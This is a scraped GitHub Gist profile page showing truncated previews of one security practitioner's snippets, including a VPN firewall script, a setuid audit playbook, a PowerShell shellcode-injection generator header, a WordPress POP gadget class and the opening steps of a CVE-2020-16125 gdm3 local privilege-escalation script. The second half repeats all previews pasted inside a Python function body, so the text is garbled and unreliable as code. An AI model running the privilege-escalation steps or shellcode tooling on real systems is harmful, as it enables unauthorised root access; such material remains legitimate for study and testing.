M. Cory Billington mcorybillington

## updetector.sh
while :; do ping -c1 -w1 8.8.8.8 &>/dev/null && echo "UP: $(date -R)" && break || echo "DOWN: $(date -R)";sleep 1;done;(speaker-test -t sine -f 1000 > /dev/null)& pid=$!;sleep 3s;kill -9 $pid

## pwshellcode.py
## Credits to the following projects for a lot of this powershell code and just general inspiration
## https://github.com/chvancooten/OSEP-Code-Snippets
## https://www.trustedsec.com/blog/native-powershell-x86-shellcode-injection-on-64-bit-platforms/

from argparse import ArgumentParser
import subprocess
import base64
import os


## sorter.sh
#!/bin/bash

TODAY="$(date '+%Y-%b-%d')"

curl -s "https://<domain>/some-list" \
-o "/path/to/working/dir/${TODAY}-domains.txt"

function check_ports()
{
    echo "Checking $1"

## ufw-vpn.sh
#!/bin/bash

VPN_INTERFACE="tun0"
LAN_INTERFACE="enp1s0"
UFW="/usr/sbin/ufw"

"${UFW}" enable
"${UFW}" --force reset
"${UFW}" default deny incoming
"${UFW}" default deny outgoing

## suspect_suids.yml
## Highly recommend testing this adequately. I threw it together and tested on a few local VM's. Not responsbile for bad things that happen due to negligence/failure to adequately test first.
---

- name: Identify manually placed setuid binaries
  gather_facts: true
  hosts: all
  tasks:

    - name: Search for manually placed setuid binaries
      shell: find / -xdev -user root -perm -4000 -printf '%M  %TF %TT  %p\n' 2>/dev/null | grep -v 0000000000

## get_favicon_hash.py
# Original credit: https://gist.github.com/yehgdotnet/b9dfc618108d2f05845c4d8e28c5fc6a
# pip3 install mmh3
import requests
from codecs import encode
from argparse import ArgumentParser
import mmh3


def main():
    parser = ArgumentParser(description="Shodan favicon hash generator")

## keybase.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                mcorybillington
                / keybase.md
            
            
              Created
              January 22, 2021 23:07
            
          
    Keybase proof

I hereby claim:

I am mcorybillington on github.
I am th3y (https://keybase.io/th3y) on keybase.
I have a public key ASC2nFUdxkdbrA6Ntrczt6VuKdgB4PUuRQNJhFsQpEbgBQo

To claim this, I am signing this object:

  
## UniversalPOPGadget.php
# Credit for this: https://nickbloor.co.uk/2018/02/28/popping-wordpress/
# I just made them print statements instead of logging...
<?php
if(!class_exists("UniversalPOPGadget")) {
class UniversalPOPGadget {
	public function __construct() { echo "UniversalPOPGadget::__construct()\n"; }
	public function __destruct() { echo "UniversalPOPGadget::__destruct()\n"; }
	public function __call($name, $args) {
		echo "UniversalPOPGadget::__call(" . $name . ", " . implode(",", $args) . ")\n";
	}

## gnome-gdm3-privesc.sh
#!/bin/bash

# Credit to Kevin Backhouse and GitHub Security Lab, I just scripted this...
# Original writeup: https://securitylab.github.com/research/Ubuntu-gdm3-accountsservice-LPE
# CVE-2020-16125

echo "[+] Creating symlink"
ln -s /dev/zero .pam_environment;

echo "[+] Changing region"

## threaded_task.py
from threading import Thread
from requests.exceptions import ConnectionError, ReadTimeout
from requests import head
from queue import Queue
from sys import argv, exit

concurrent = 200


def do_work():
	## Credits to the following projects for a lot of this powershell code and just general inspiration
	## https://github.com/chvancooten/OSEP-Code-Snippets
	## https://www.trustedsec.com/blog/native-powershell-x86-shellcode-injection-on-64-bit-platforms/

	from argparse import ArgumentParser
	import subprocess
	import base64
	import os
	#!/bin/bash

	TODAY="$(date '+%Y-%b-%d')"

	curl -s "https://<domain>/some-list" \
	-o "/path/to/working/dir/${TODAY}-domains.txt"

	function check_ports()
	{
	echo "Checking $1"
	#!/bin/bash

	VPN_INTERFACE="tun0"
	LAN_INTERFACE="enp1s0"
	UFW="/usr/sbin/ufw"

	"${UFW}" enable
	"${UFW}" --force reset
	"${UFW}" default deny incoming
	"${UFW}" default deny outgoing
	## Highly recommend testing this adequately. I threw it together and tested on a few local VM's. Not responsbile for bad things that happen due to negligence/failure to adequately test first.
	---

	- name: Identify manually placed setuid binaries
	gather_facts: true
	hosts: all
	tasks:

	- name: Search for manually placed setuid binaries
	shell: find / -xdev -user root -perm -4000 -printf '%M %TF %TT %p\n' 2>/dev/null \| grep -v 0000000000
	# Original credit: https://gist.github.com/yehgdotnet/b9dfc618108d2f05845c4d8e28c5fc6a
	# pip3 install mmh3
	import requests
	from codecs import encode
	from argparse import ArgumentParser
	import mmh3


	def main():
	parser = ArgumentParser(description="Shodan favicon hash generator")
	# Credit for this: https://nickbloor.co.uk/2018/02/28/popping-wordpress/
	# I just made them print statements instead of logging...
	<?php
	if(!class_exists("UniversalPOPGadget")) {
	class UniversalPOPGadget {
	public function __construct() { echo "UniversalPOPGadget::__construct()\n"; }
	public function __destruct() { echo "UniversalPOPGadget::__destruct()\n"; }
	public function __call($name, $args) {
	echo "UniversalPOPGadget::__call(" . $name . ", " . implode(",", $args) . ")\n";
	}
	#!/bin/bash

	# Credit to Kevin Backhouse and GitHub Security Lab, I just scripted this...
	# Original writeup: https://securitylab.github.com/research/Ubuntu-gdm3-accountsservice-LPE
	# CVE-2020-16125

	echo "[+] Creating symlink"
	ln -s /dev/zero .pam_environment;

	echo "[+] Changing region"
	from threading import Thread
	from requests.exceptions import ConnectionError, ReadTimeout
	from requests import head
	from queue import Queue
	from sys import argv, exit

	concurrent = 200


	def do_work():